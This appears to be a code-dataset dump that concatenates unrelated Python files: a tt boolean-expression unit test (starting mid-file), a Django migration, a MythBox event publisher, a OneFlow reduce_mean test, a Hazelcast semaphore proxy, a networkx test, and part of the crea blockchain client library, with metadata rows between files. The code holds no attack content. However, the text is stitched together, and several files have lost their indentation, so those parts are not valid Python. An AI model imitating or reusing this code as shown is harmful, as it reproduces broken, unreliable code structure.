repr(next(clauses)),
'<BooleanExpression "A or B or C or D">')
with self.assertRaises(StopIteration):
next(clauses)
# ensure falls back to DNF
b = BooleanExpression('(A and B and C) or (D and E and F)')
self.assertFalse(b.is_cnf)
self.assertTrue(b.is_dnf)
clauses = b.iter_clauses()
self.assertEqual(
repr(next(clauses)),
'<BooleanExpression "A and B and C">')
self.assertEqual(
repr(next(clauses)),
'<BooleanExpression "D and E and F">')
with self.assertRaises(StopIteration):
next(clauses)
def test_simple_iter_cnf(self):
"""Test basic expression iter_cnf_clauses functionality."""
b = BooleanExpression('(A or B) and (C or D) and (E or F)')
self.assertTrue(b.is_cnf)
self.assertFalse(b.is_dnf)
clauses = b.iter_cnf_clauses()
self.assertEqual(
repr(next(clauses)),
'<BooleanExpression "A or B">')
self.assertEqual(
repr(next(clauses)),
'<BooleanExpression "C or D">')
self.assertEqual(
repr(next(clauses)),
'<BooleanExpression "E or F">')
with self.assertRaises(StopIteration):
next(clauses)
def test_simple_iter_dnf(self):
"""Test basic expression iter_dnf_clauses functionality."""
b = BooleanExpression('(A and B) or (C and D) or (E and F)')
self.assertTrue(b.is_dnf)
self.assertFalse(b.is_cnf)
clauses = b.iter_dnf_clauses()
self.assertEqual(
repr(next(clauses)),
'<BooleanExpression "A and B">')
self.assertEqual(
repr(next(clauses)),
'<BooleanExpression "C and D">')
self.assertEqual(
repr(next(clauses)),
'<BooleanExpression "E and F">')
with self.assertRaises(StopIteration):
next(clauses)
| 32.951807 | 75 | 0.609141 | [
"MIT"
] | fkromer/tt | tt/tests/unit/expressions/test_bexpr_iter_clauses.py | 2,735 | Python |
# -*- coding: utf-8 -*-
# Generated by Django 1.11.3 on 2018-03-01 09:58
from __future__ import unicode_literals
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('projects', '0018_project_properties'),
]
operations = [
migrations.AlterModelOptions(
name='product',
options={'ordering': ['-id'], 'permissions': (('view_product', 'View product'),)},
),
migrations.AlterModelOptions(
name='productstatus',
options={'ordering': ['-id'], 'permissions': (('view_productstatus', 'View product status'),)},
),
migrations.AlterModelOptions(
name='project',
options={'ordering': ['-identifier'], 'permissions': (('view_project', 'View project'),)},
),
migrations.AlterModelOptions(
name='projectstatus',
options={'ordering': ['-id'], 'permissions': (('view_projectstatus', 'View project status'),)},
),
]
| 32.03125 | 107 | 0.580488 | [
"MIT"
] | GETLIMS/LIMS-Backend | lims/projects/migrations/0019_auto_20180301_0958.py | 1,025 | Python |
#
# MythBox for XBMC - http://mythbox.googlecode.com
# Copyright (C) 2011 [email protected]
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License
# as published by the Free Software Foundation; either version 2
# of the License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.
#
import logging
import xbmc
from mythbox.bus import Event
from mythbox.util import run_async
from mythbox.mythtv.conn import EventConnection, inject_conn
log = logging.getLogger('mythbox.core')
class MythEventPublisher(object):
# Before recording starts:
#
# [u'BACKEND_MESSAGE', u'SYSTEM_EVENT REC_PENDING SECS 120 CARDID 7 CHANID 4282 STARTTIME 2011-05-27T20:00:00 SENDER athena', u'empty']
#
# Delete recording
#
# [u'BACKEND_MESSAGE', u'RECORDING_LIST_CHANGE DELETE 1071 2011-05-27T15:30:00', u'empty']
#
# Create/edit/delete schedule
#
# [u'BACKEND_MESSAGE', u'SCHEDULE_CHANGE', u'empty']
#
def __init__(self, *args, **kwargs):
[setattr(self, k, v) for k,v in kwargs.items() if k in ['bus', 'settings','translator','platform']]
self.closed = False
@inject_conn
def supportsSystemEvents(self):
return self.conn().platform.supportsSystemEvents()
@run_async
def startup(self):
log.debug('Starting MythEventPublisher..')
self.eventConn = EventConnection(settings=self.settings, translator=self.translator, platform=self.platform, bus=self.bus)
while not self.closed and not xbmc.abortRequested:
try:
tokens = self.eventConn.readEvent()
if len(tokens) >= 2 and not tokens[1].startswith(u'UPDATE_FILE_SIZE'):
log.debug('EVENT: %s' % tokens)
if len(tokens)>=3 and tokens[0] == 'BACKEND_MESSAGE':
if tokens[1].startswith('SYSTEM_EVENT') and 'SCHEDULER_RAN' in tokens[1]:
self.bus.publish({'id':Event.SCHEDULER_RAN})
elif tokens[1].startswith('COMMFLAG_START'):
self.bus.publish({'id':Event.COMMFLAG_START})
elif tokens[1].startswith('SCHEDULE_CHANGE'):
self.bus.publish({'id':Event.SCHEDULE_CHANGED})
except Exception, e:
log.exception(e)
log.debug('Exiting MythEventPublisher')
def shutdown(self):
self.closed = True
try:
self.eventConn.close()
except:
            log.exception('On shutting down MythEventPublisher')
| 38.277108 | 144 | 0.627951 | [
"Apache-2.0"
] | C6SUMMER/allinclusive-kodi-pi | .kodi/addons/script.mythbox/resources/src/mythbox/mythtv/publish.py | 3,177 | Python |
"""
Copyright 2020 The OneFlow Authors. All rights reserved.
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
import os
from collections import OrderedDict
import numpy as np
import oneflow as flow
import tensorflow as tf
import test_global_storage
from test_util import GenArgList
gpus = tf.config.experimental.list_physical_devices("GPU")
for gpu in gpus:
tf.config.experimental.set_memory_growth(gpu, True)
def compare_with_tensorflow(device_type, input_shape, axis, keepdims):
assert device_type in ["gpu", "cpu"]
flow.clear_default_session()
func_config = flow.FunctionConfig()
func_config.default_data_type(flow.float)
@flow.global_function(type="train", function_config=func_config)
def ReduceMeanJob():
with flow.scope.placement(device_type, "0:0"):
x = flow.get_variable(
"x",
shape=input_shape,
dtype=flow.float,
initializer=flow.random_uniform_initializer(minval=-10, maxval=10),
trainable=True,
)
loss = flow.math.reduce_mean(x, axis=axis, keepdims=keepdims)
# TODO: fix facade and add_loss bug
loss = flow.identity(loss)
flow.optimizer.SGD(
flow.optimizer.PiecewiseConstantScheduler([], [1e-4]), momentum=0
).minimize(loss)
flow.watch(x, test_global_storage.Setter("x"))
flow.watch_diff(x, test_global_storage.Setter("x_diff"))
flow.watch(loss, test_global_storage.Setter("loss"))
flow.watch_diff(loss, test_global_storage.Setter("loss_diff"))
return loss
# OneFlow
check_point = flow.train.CheckPoint()
check_point.init()
of_out = ReduceMeanJob().get()
# TensorFlow
with tf.GradientTape(persistent=True) as tape:
x = tf.Variable(test_global_storage.Get("x"))
tf_out = tf.math.reduce_mean(x, axis=axis, keepdims=keepdims)
loss_diff = test_global_storage.Get("loss_diff")
tf_x_diff = tape.gradient(tf_out, x, loss_diff)
assert np.allclose(of_out.numpy(), tf_out.numpy(), rtol=1e-5, atol=1e-5)
assert np.allclose(
test_global_storage.Get("x_diff"), tf_x_diff.numpy(), rtol=1e-5, atol=1e-5
)
def test_reduce_mean(test_case):
arg_dict = OrderedDict()
arg_dict["device_type"] = ["gpu"]
arg_dict["input_shape"] = [(64, 64, 64)]
arg_dict["axis"] = [None, [1], [0, 2]]
arg_dict["keepdims"] = [True, False]
for arg in GenArgList(arg_dict):
compare_with_tensorflow(*arg)
| 35.776471 | 83 | 0.680368 | [
"Apache-2.0"
] | ashing-zhang/oneflow | oneflow/python/test/ops/test_reduce_mean.py | 3,041 | Python |
from hazelcast.protocol.codec import \
semaphore_acquire_codec, \
semaphore_available_permits_codec, \
semaphore_drain_permits_codec, \
semaphore_init_codec, \
semaphore_reduce_permits_codec, \
semaphore_release_codec, \
semaphore_try_acquire_codec
from hazelcast.proxy.base import PartitionSpecificProxy
from hazelcast.util import check_not_negative, to_millis
class Semaphore(PartitionSpecificProxy):
"""
Semaphore is a backed-up distributed alternative to the Python `asyncio.Semaphore <https://docs.python.org/3/library/asyncio-sync.html>`_
Semaphore is a cluster-wide counting semaphore. Conceptually, it maintains a set of permits. Each acquire() blocks
if necessary until a permit is available, and then takes it. Each release() adds a permit, potentially releasing a
blocking acquirer. However, no actual permit objects are used; the semaphore just keeps a count of the number
available and acts accordingly.
The Hazelcast distributed semaphore implementation guarantees that threads invoking any of the acquire methods are
selected to obtain permits in the order in which their invocation of those methods was processed(first-in-first-out;
FIFO). Note that FIFO ordering necessarily applies to specific internal points of execution within the cluster.
Therefore, it is possible for one member to invoke acquire before another, but reach the ordering point after the
other, and similarly upon return from the method.
This class also provides convenience methods to acquire and release multiple permits at a time. Beware of the
increased risk of indefinite postponement when using the multiple acquire. If a single permit is released to a
semaphore that is currently blocking, a thread waiting for one permit will acquire it before a thread waiting for
multiple permits regardless of the call order.
"""
def init(self, permits):
"""
Try to initialize this Semaphore instance with the given permit count.
:param permits: (int), the given permit count.
        :return: (bool), ``true`` if the initialization succeeds.
"""
check_not_negative(permits, "Permits cannot be negative!")
return self._encode_invoke(semaphore_init_codec, permits=permits)
def acquire(self, permits=1):
"""
        Acquires one or the specified number of permits if available, and returns immediately, reducing the number
        of available permits by one or the given amount.
If insufficient permits are available then the current thread becomes disabled for thread scheduling purposes
and lies dormant until one of following happens:
* some other thread invokes one of the release methods for this semaphore, the current thread is next to be
assigned permits and the number of available permits satisfies this request,
* this Semaphore instance is destroyed, or
* some other thread interrupts the current thread.
:param permits: (int), the number of permits to acquire (optional).
"""
check_not_negative(permits, "Permits cannot be negative!")
return self._encode_invoke(semaphore_acquire_codec, permits=permits)
def available_permits(self):
"""
Returns the current number of permits currently available in this semaphore.
* This method is typically used for debugging and testing purposes.
:return: (int), the number of available permits in this semaphore.
"""
return self._encode_invoke(semaphore_available_permits_codec)
def drain_permits(self):
"""
Acquires and returns all permits that are immediately available.
:return: (int), the number of permits drained.
"""
return self._encode_invoke(semaphore_drain_permits_codec)
def reduce_permits(self, reduction):
"""
Shrinks the number of available permits by the indicated reduction. This method differs from acquire in that it
does not block waiting for permits to become available.
:param reduction: (int), the number of permits to remove.
"""
check_not_negative(reduction, "Reduction cannot be negative!")
return self._encode_invoke(semaphore_reduce_permits_codec, reduction=reduction)
def release(self, permits=1):
"""
Releases one or given number of permits, increasing the number of available permits by one or that amount.
There is no requirement that a thread that releases a permit must have acquired that permit by calling one of
the acquire methods. Correct usage of a semaphore is established by programming convention in the application.
:param permits: (int), the number of permits to release (optional).
"""
check_not_negative(permits, "Permits cannot be negative!")
return self._encode_invoke(semaphore_release_codec, permits=permits)
def try_acquire(self, permits=1, timeout=0):
"""
Tries to acquire one or the given number of permits, if they are available, and returns immediately, with the
value ``true``, reducing the number of available permits by the given amount.
If there are insufficient permits and a timeout is provided, the current thread becomes disabled for thread
scheduling purposes and lies dormant until one of following happens:
* some other thread invokes the release() method for this semaphore and the current thread is next to be
assigned a permit, or
* some other thread interrupts the current thread, or
* the specified waiting time elapses.
If there are insufficient permits and no timeout is provided, this method will return immediately with the value
``false`` and the number of available permits is unchanged.
:param permits: (int), the number of permits to acquire (optional).
:param timeout: (long), the maximum time in seconds to wait for the permit(s) (optional).
:return: (bool), ``true`` if desired amount of permits was acquired, ``false`` otherwise.
"""
check_not_negative(permits, "Permits cannot be negative!")
return self._encode_invoke(semaphore_try_acquire_codec, permits=permits, timeout=to_millis(timeout))
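# Illustrative client-side usage sketch (assumed; requires a running cluster
# and a client configured against it). The get_semaphore() factory and the
# future-style .result() calls reflect how this proxy is typically obtained
# and awaited, but the exact bootstrap code depends on the client version.
#   import hazelcast
#   client = hazelcast.HazelcastClient()
#   semaphore = client.get_semaphore("build-slots")
#   semaphore.init(3).result()                     # start with three permits
#   if semaphore.try_acquire(permits=2, timeout=5).result():
#       try:
#           pass                                   # guarded work goes here
#       finally:
#           semaphore.release(permits=2).result()
#   client.shutdown()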
| 52.495868 | 141 | 0.720875 | [
"Apache-2.0"
] | Kilo59/hazelcast-python-client | hazelcast/proxy/semaphore.py | 6,352 | Python |
from nose.tools import *
import networkx as nx
import networkx.algorithms.approximation as a
def test_min_maximal_matching():
# smoke test
G = nx.Graph()
assert_equal(len(a.min_maximal_matching(G)),0)
| 24.666667 | 51 | 0.720721 | [
"MIT"
] | kushgrover/apt-vs-dift | src/prism-fruit/Games-DQL/examples/games/car/networkx/algorithms/approximation/tests/test_matching.py | 222 | Python |
import keyboard
import settings
from key_sender import *
import utils
class HotKey(object):
def __init__(self):
pass
def regist_hotkey(self, hotkey_group, queue_h):
if settings.test:
keyboard.add_hotkey('F10', self.f10_fun)
keyboard.add_hotkey('F11', self.f11_fun)
keyboard.add_hotkey('F12', self.f12_fun)
elif hotkey_group == settings.KeyGroupEnum.modau:
keyboard.add_hotkey('F10', self.modau_f10_fun)
keyboard.add_hotkey('F11', self.modau_f11_fun)
keyboard.add_hotkey('F12', self.modau_f12_fun)
keyboard.wait('esc')
queue_h.put('end')
@staticmethod
def send_key(key):
# time.sleep(0.1)
key_press(key)
def f10_fun(self):
# self.get_foreground_title()
self.send_key(Key['down_arrow'])
self.send_key(Key['up_arrow'])
self.send_key(Key['spacebar'])
def f11_fun(self):
self.send_key(Key['up_arrow'])
self.send_key(Key['up_arrow'])
self.send_key(Key['spacebar'])
def f12_fun(self):
print(utils.get_foreground_title())
# self.send_key(Key['up_arrow'])
# self.send_key(Key['right_arrow'])
# self.send_key(Key['spacebar'])
    # Modau hotkeys
def modau_f10_fun(self):
self.send_key(Key['down_arrow'])
self.send_key(Key['up_arrow'])
self.send_key(Key['spacebar'])
def modau_f11_fun(self):
self.send_key(Key['up_arrow'])
self.send_key(Key['up_arrow'])
self.send_key(Key['spacebar'])
def modau_f12_fun(self):
self.send_key(Key['up_arrow'])
self.send_key(Key['right_arrow'])
self.send_key(Key['spacebar'])
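# Illustrative usage sketch (assumed, not part of the original module): the
# Modau hotkey group is registered and the call blocks until Esc is pressed,
# after which 'end' is pushed onto the queue. settings.KeyGroupEnum comes from
# the project's settings module imported above.
if __name__ == '__main__':
    from queue import Queue
    queue_h = Queue()
    HotKey().regist_hotkey(settings.KeyGroupEnum.modau, queue_h)
    print(queue_h.get())  # 'end' once Esc has been pressed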
| 28.245902 | 58 | 0.614045 | [
"Apache-2.0"
] | Llona/hotkey | send_key_explame/pypiwin32/hot_key.py | 1,727 | Python |
import os
import re
import sys
import json
import time
import requests
import downloader
from config import TEMP_FOLDER
# HTTP request headers used by the crawler
headers = {
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
'Accept-Language': 'zh-CN,zh;q=0.9,zh-TW;q=0.8,en;q=0.7',
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36',
}
class Blackboard():
def __init__(self, html):
self.html = html
def links(self):
classin_re = re.compile(r'https\:\/\/www\.eeo\.cn\/live\.php\?lessonKey\=[0-9a-zA-Z]+')
links = classin_re.findall(self.html)
return links
def lessonkeys(self):
classin_re = re.compile(r'(?<=https:\/\/www\.eeo\.cn\/live\.php\?lessonKey\=)[0-9a-zA-Z]+')
keys = classin_re.findall(self.html)
return keys
class Classin():
def __init__(self, lessonkey):
self.lessonkey = lessonkey
self.webcastdata = None
self.classinfo = None
def _webcastdata(self):
if self.webcastdata:
return self.webcastdata
from_data = {
'lessonKey': self.lessonkey
}
r = requests.post('https://www.eeo.cn/saasajax/webcast.ajax.php?action=getLessonWebcastData', data=from_data)
self.webcastdata = json.loads(r.text)
return self.webcastdata
def _classinfo(self):
if self.classinfo:
return self.classinfo
from_data = {
'lessonKey': self.lessonkey
}
r = requests.post('https://www.eeo.cn/saasajax/webcast.ajax.php?action=getLessonClassInfo', data=from_data)
self.classinfo = json.loads(r.text)
return self.classinfo
def course_name(self):
data = self._classinfo()
return data['data']['courseName']
def teacher(self):
data = self._classinfo()
return data['data']['teacherName']
def school(self):
data = self._classinfo()
return data['data']['schoolName']
def start_timestamp(self):
        # Unix timestamp in seconds
data = self._classinfo()
return data['data']['lessonStarttime']
def end_timestamp(self):
        # Unix timestamp in seconds
data = self._classinfo()
return data['data']['lessonEndtime']
def videolist(self):
data = self._webcastdata()
vlist = data['data']['lessonData']['vodList']
result = []
for i in sorted(vlist):
result.append(vlist[i])
return result
def _md(self, timestamp):
local_time = time.localtime(int(timestamp))
md = time.strftime("%m%d", local_time)
return md
def md(self):
return self._md(self.start_timestamp())
def info(self):
obj = {
'course_name': self.course_name(),
'teacher': self.teacher(),
'videolist': self.videolist(),
'start_timestamp': self.start_timestamp(),
'end_timestamp': self.end_timestamp(),
'md': self.md()
}
return obj
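# Illustrative usage sketch (the lesson key below is a placeholder): fetch the
# metadata and replay URLs for a single ClassIn lesson via the class above.
#   lesson = Classin('REPLACE_WITH_LESSON_KEY')
#   details = lesson.info()
#   print(details['course_name'], details['teacher'], details['md'])
#   for url in details['videolist']:
#       print(url)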
def get_classin_video(lessonkey):
c = Classin(lessonkey)
path = os.path.join(c.course_name(), c.teacher(), c.md())
if not os.path.exists(path):
os.makedirs(path)
vlist = c.videolist()
for i, v in enumerate(vlist):
# r = requests.get(v, stream=True)
vfile = os.path.join(path, '{}.mp4'.format(i))
        print('Downloading:', c.md())
try:
downloader.multithread_download(v, vfile)
except Exception as e:
            print(vfile, 'download failed\nlink: ', v, '\nerror: ', e)
# f = open(vfile, "wb")
# try:
# for chunk in r.iter_content(chunk_size=512):
# if chunk:
# f.write(chunk)
# except Exception as e:
        #     print(vfile, 'download failed\nlink: ', v, '\nerror: ', e)
def get_bb_videos(html_path):
with open(html_path, 'r', encoding='utf-8') as f:
bb_html = f.read()
b = Blackboard(bb_html)
lessonkeys = b.lessonkeys()
for key in lessonkeys:
get_classin_video(key)
def download_all_videos_from_bb_txt():
temp_file_path = 'temp.txt'
    open(temp_file_path, 'w', encoding='utf-8').close()  # create an empty temporary text file
    input('A text editor is about to open. Press Enter to continue...')
    os.startfile(temp_file_path)
    input("Paste the page source of the ClassIn '在线研讨室 - 全部显示' (online classroom - show all) page into the file, save and close it, then press Enter to start downloading...")
if not os.path.exists(TEMP_FOLDER):
os.mkdir(TEMP_FOLDER)
get_bb_videos(temp_file_path)
os.remove(temp_file_path)
if __name__ == "__main__":
download_all_videos_from_bb_txt()
| 29.746753 | 134 | 0.59201 | [
"MIT"
] | JiangGua/classin-downloader | src/bbparser.py | 4,781 | Python |
# This Python file uses the following encoding: utf-8
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals
from builtins import str
from builtins import object
import json
import logging
import re
import os
import math
import ast
import time
from creagraphenebase.py23 import bytes_types, integer_types, string_types, text_type
from datetime import datetime, timedelta, date
from creaapi.creanoderpc import CreaNodeRPC
from creaapi.exceptions import NoAccessApi, NoApiWithName
from creagraphenebase.account import PrivateKey, PublicKey
from creabase import transactions, operations
from creagraphenebase.chains import known_chains
from .account import Account
from .amount import Amount
from .price import Price
from .storage import configStorage as config
from .version import version as crea_version
from .exceptions import (
AccountExistsException,
AccountDoesNotExistsException
)
from .wallet import Wallet
from .creaconnect import CreaConnect
from .transactionbuilder import TransactionBuilder
from .utils import formatTime, resolve_authorperm, derive_permlink, remove_from_dict, addTzInfo, formatToTimeStamp
from crea.constants import CREA_VOTE_REGENERATION_SECONDS, CREA_100_PERCENT, CREA_1_PERCENT, CREA_RC_REGEN_TIME
log = logging.getLogger(__name__)
class Crea(object):
""" Connect to the Crea network.
:param str node: Node to connect to *(optional)*
:param str rpcuser: RPC user *(optional)*
:param str rpcpassword: RPC password *(optional)*
:param bool nobroadcast: Do **not** broadcast a transaction!
*(optional)*
:param bool unsigned: Do **not** sign a transaction! *(optional)*
:param bool debug: Enable Debugging *(optional)*
:param keys: Predefine the wif keys to shortcut the
wallet database *(optional)*
:type keys: array, dict, string
:param wif: Predefine the wif keys to shortcut the
wallet database *(optional)*
:type wif: array, dict, string
:param bool offline: Boolean to prevent connecting to network (defaults
to ``False``) *(optional)*
:param int expiration: Delay in seconds until transactions are supposed
to expire *(optional)* (default is 30)
:param str blocking: Wait for broadcasted transactions to be included
in a block and return full transaction (can be "head" or
"irreversible")
:param bool bundle: Do not broadcast transactions right away, but allow
to bundle operations. It is not possible to send out more than one
vote operation and more than one comment operation in a single broadcast *(optional)*
:param bool appbase: Use the new appbase rpc protocol on nodes with version
0.19.4 or higher. The settings has no effect on nodes with version of 0.19.3 or lower.
:param int num_retries: Set the maximum number of reconnects to the nodes before
NumRetriesReached is raised. Disabled for -1. (default is -1)
        :param int num_retries_call: Repeat a failing rpc call up to num_retries_call times on node errors (default is 5)
:param int timeout: Timeout setting for https nodes (default is 60)
:param bool use_sc2: When True, a creaconnect object is created. Can be used for
broadcast posting op or creating hot_links (default is False)
:param CreaConnect creaconnect: A CreaConnect object can be set manually, set use_sc2 to True
:param dict custom_chains: custom chain which should be added to the known chains
Three wallet operation modes are possible:
* **Wallet Database**: Here, the crealibs load the keys from the
locally stored wallet SQLite database (see ``storage.py``).
To use this mode, simply call ``Crea()`` without the
``keys`` parameter
* **Providing Keys**: Here, you can provide the keys for
your accounts manually. All you need to do is add the wif
keys for the accounts you want to use as a simple array
using the ``keys`` parameter to ``Crea()``.
        * **Force keys**: This mode is for advanced users and
requires that you know what you are doing. Here, the
``keys`` parameter is a dictionary that overwrite the
``active``, ``owner``, ``posting`` or ``memo`` keys for
any account. This mode is only used for *foreign*
signatures!
If no node is provided, it will connect to default nodes of
http://geo.crea.pl. Default settings can be changed with:
.. code-block:: python
crea = Crea(<host>)
where ``<host>`` starts with ``https://``, ``ws://`` or ``wss://``.
        The purpose of this class is to simplify interaction with
Crea.
The idea is to have a class that allows to do this:
.. code-block:: python
>>> from crea import Crea
>>> crea = Crea()
>>> print(crea.get_blockchain_version()) # doctest: +SKIP
This class also deals with edits, votes and reading content.
Example for adding a custom chain:
.. code-block:: python
from crea import Crea
stm = Crea(node=["https://mytstnet.com"], custom_chains={"MYTESTNET":
{'chain_assets': [{'asset': 'CBD', 'id': 0, 'precision': 3, 'symbol': 'CBD'},
{'asset': 'CREA', 'id': 1, 'precision': 3, 'symbol': 'CREA'},
{'asset': 'VESTS', 'id': 2, 'precision': 6, 'symbol': 'VESTS'}],
'chain_id': '79276aea5d4877d9a25892eaa01b0adf019d3e5cb12a97478df3298ccdd01674',
'min_version': '0.0.0',
'prefix': 'MTN'}
}
)
"""
def __init__(self,
node="",
rpcuser=None,
rpcpassword=None,
debug=False,
data_refresh_time_seconds=900,
**kwargs):
"""Init crea
:param str node: Node to connect to *(optional)*
:param str rpcuser: RPC user *(optional)*
:param str rpcpassword: RPC password *(optional)*
:param bool nobroadcast: Do **not** broadcast a transaction!
*(optional)*
:param bool unsigned: Do **not** sign a transaction! *(optional)*
:param bool debug: Enable Debugging *(optional)*
:param array,dict,string keys: Predefine the wif keys to shortcut the
wallet database *(optional)*
:param array,dict,string wif: Predefine the wif keys to shortcut the
wallet database *(optional)*
:param bool offline: Boolean to prevent connecting to network (defaults
to ``False``) *(optional)*
:param int expiration: Delay in seconds until transactions are supposed
to expire *(optional)* (default is 30)
:param str blocking: Wait for broadcast transactions to be included
in a block and return full transaction (can be "head" or
"irreversible")
:param bool bundle: Do not broadcast transactions right away, but allow
to bundle operations *(optional)*
:param bool use_condenser: Use the old condenser_api rpc protocol on nodes with version
0.19.4 or higher. The settings has no effect on nodes with version of 0.19.3 or lower.
:param int num_retries: Set the maximum number of reconnects to the nodes before
NumRetriesReached is raised. Disabled for -1. (default is -1)
:param int num_retries_call: Repeat num_retries_call times a rpc call on node error (default is 5)
:param int timeout: Timeout setting for https nodes (default is 60)
:param bool use_sc2: When True, a creaconnect object is created. Can be used for broadcast
posting op or creating hot_links (default is False)
:param CreaConnect creaconnect: A CreaConnect object can be set manually, set use_sc2 to True
"""
self.rpc = None
self.debug = debug
self.offline = bool(kwargs.get("offline", False))
self.nobroadcast = bool(kwargs.get("nobroadcast", False))
self.unsigned = bool(kwargs.get("unsigned", False))
self.expiration = int(kwargs.get("expiration", 30))
self.bundle = bool(kwargs.get("bundle", False))
self.creaconnect = kwargs.get("creaconnect", None)
self.use_sc2 = bool(kwargs.get("use_sc2", False))
self.blocking = kwargs.get("blocking", False)
self.custom_chains = kwargs.get("custom_chains", {})
# Store config for access through other Classes
self.config = config
if not self.offline:
self.connect(node=node,
rpcuser=rpcuser,
rpcpassword=rpcpassword,
**kwargs)
self.data = {'last_refresh': None, 'last_node': None, 'dynamic_global_properties': None, 'feed_history': None,
'get_feed_history': None, 'hardfork_properties': None,
'network': None, 'witness_schedule': None,
'config': None, 'reward_funds': None}
self.data_refresh_time_seconds = data_refresh_time_seconds
# self.refresh_data()
# txbuffers/propbuffer are initialized and cleared
self.clear()
self.wallet = Wallet(crea_instance=self, **kwargs)
# set creaconnect
if self.creaconnect is not None and not isinstance(self.creaconnect, CreaConnect):
raise ValueError("creaconnect musst be CreaConnect object")
if self.creaconnect is None and self.use_sc2:
self.creaconnect = CreaConnect(crea_instance=self, **kwargs)
elif self.creaconnect is not None and not self.use_sc2:
self.use_sc2 = True
# -------------------------------------------------------------------------
# Basic Calls
# -------------------------------------------------------------------------
def connect(self,
node="",
rpcuser="",
rpcpassword="",
**kwargs):
""" Connect to Crea network (internal use only)
"""
if not node:
node = self.get_default_nodes()
if not bool(node):
raise ValueError("A Crea node needs to be provided!")
if not rpcuser and "rpcuser" in config:
rpcuser = config["rpcuser"]
if not rpcpassword and "rpcpassword" in config:
rpcpassword = config["rpcpassword"]
self.rpc = CreaNodeRPC(node, rpcuser, rpcpassword, **kwargs)
def is_connected(self):
"""Returns if rpc is connected"""
return self.rpc is not None
def __repr__(self):
if self.offline:
return "<%s offline=True>" % (
self.__class__.__name__)
elif self.rpc is not None and len(self.rpc.url) > 0:
return "<%s node=%s, nobroadcast=%s>" % (
self.__class__.__name__, str(self.rpc.url), str(self.nobroadcast))
else:
return "<%s, nobroadcast=%s>" % (
self.__class__.__name__, str(self.nobroadcast))
def refresh_data(self, force_refresh=False, data_refresh_time_seconds=None):
""" Read and stores crea blockchain parameters
If the last data refresh is older than data_refresh_time_seconds, data will be refreshed
:param bool force_refresh: if True, a refresh of the data is enforced
:param float data_refresh_time_seconds: set a new minimal refresh time in seconds
"""
if self.offline:
return
if data_refresh_time_seconds is not None:
self.data_refresh_time_seconds = data_refresh_time_seconds
if self.data['last_refresh'] is not None and not force_refresh and self.data["last_node"] == self.rpc.url:
if (datetime.utcnow() - self.data['last_refresh']).total_seconds() < self.data_refresh_time_seconds:
return
self.data['last_refresh'] = datetime.utcnow()
self.data["last_node"] = self.rpc.url
self.data["dynamic_global_properties"] = self.get_dynamic_global_properties(False)
try:
self.data['feed_history'] = self.get_feed_history(False)
self.data['get_feed_history'] = self.get_feed_history(False)
except:
self.data['feed_history'] = None
self.data['get_feed_history'] = None
try:
self.data['hardfork_properties'] = self.get_hardfork_properties(False)
except:
self.data['hardfork_properties'] = None
self.data['network'] = self.get_network(False)
self.data['witness_schedule'] = self.get_witness_schedule(False)
self.data['config'] = self.get_config(False)
self.data['reward_funds'] = self.get_reward_funds(False)
def get_dynamic_global_properties(self, use_stored_data=True):
""" This call returns the *dynamic global properties*
:param bool use_stored_data: if True, stored data will be returned. If stored data are
empty or old, refresh_data() is used.
"""
if use_stored_data:
self.refresh_data()
return self.data['dynamic_global_properties']
if self.rpc is None:
return None
self.rpc.set_next_node_on_empty_reply(True)
return self.rpc.get_dynamic_global_properties(api="database")
def get_reserve_ratio(self):
""" This call returns the *reserve ratio*
"""
if self.rpc is None:
return None
self.rpc.set_next_node_on_empty_reply(True)
if self.rpc.get_use_appbase():
return self.rpc.get_reserve_ratio(api="witness")
else:
props = self.get_dynamic_global_properties()
# conf = self.get_config()
reserve_ratio = {'id': 0, 'average_block_size': props['average_block_size'],
'current_reserve_ratio': props['current_reserve_ratio'],
'max_virtual_bandwidth': props['max_virtual_bandwidth']}
return reserve_ratio
def get_feed_history(self, use_stored_data=True):
""" Returns the feed_history
:param bool use_stored_data: if True, stored data will be returned. If stored data are
empty or old, refresh_data() is used.
"""
if use_stored_data:
self.refresh_data()
return self.data['feed_history']
if self.rpc is None:
return None
self.rpc.set_next_node_on_empty_reply(True)
return self.rpc.get_feed_history(api="database")
def get_reward_funds(self, use_stored_data=True):
""" Get details for a reward fund.
:param bool use_stored_data: if True, stored data will be returned. If stored data are
empty or old, refresh_data() is used.
"""
if use_stored_data:
self.refresh_data()
return self.data['reward_funds']
if self.rpc is None:
return None
ret = None
self.rpc.set_next_node_on_empty_reply(True)
if self.rpc.get_use_appbase():
funds = self.rpc.get_reward_funds(api="database")
if funds is not None:
funds = funds['funds']
else:
return None
if len(funds) > 0:
funds = funds[0]
ret = funds
else:
ret = self.rpc.get_reward_fund("post", api="database")
return ret
def get_current_median_history(self, use_stored_data=True):
""" Returns the current median price
:param bool use_stored_data: if True, stored data will be returned. If stored data are
empty or old, refresh_data() is used.
"""
if use_stored_data:
self.refresh_data()
if self.data['get_feed_history']:
return self.data['get_feed_history']['current_median_history']
else:
return None
if self.rpc is None:
return None
ret = None
self.rpc.set_next_node_on_empty_reply(True)
if self.rpc.get_use_appbase():
ret = self.rpc.get_feed_history(api="database")['current_median_history']
else:
ret = self.rpc.get_current_median_history_price(api="database")
return ret
def get_hardfork_properties(self, use_stored_data=True):
""" Returns Hardfork and live_time of the hardfork
:param bool use_stored_data: if True, stored data will be returned. If stored data are
empty or old, refresh_data() is used.
"""
if use_stored_data:
self.refresh_data()
return self.data['hardfork_properties']
if self.rpc is None:
return None
ret = None
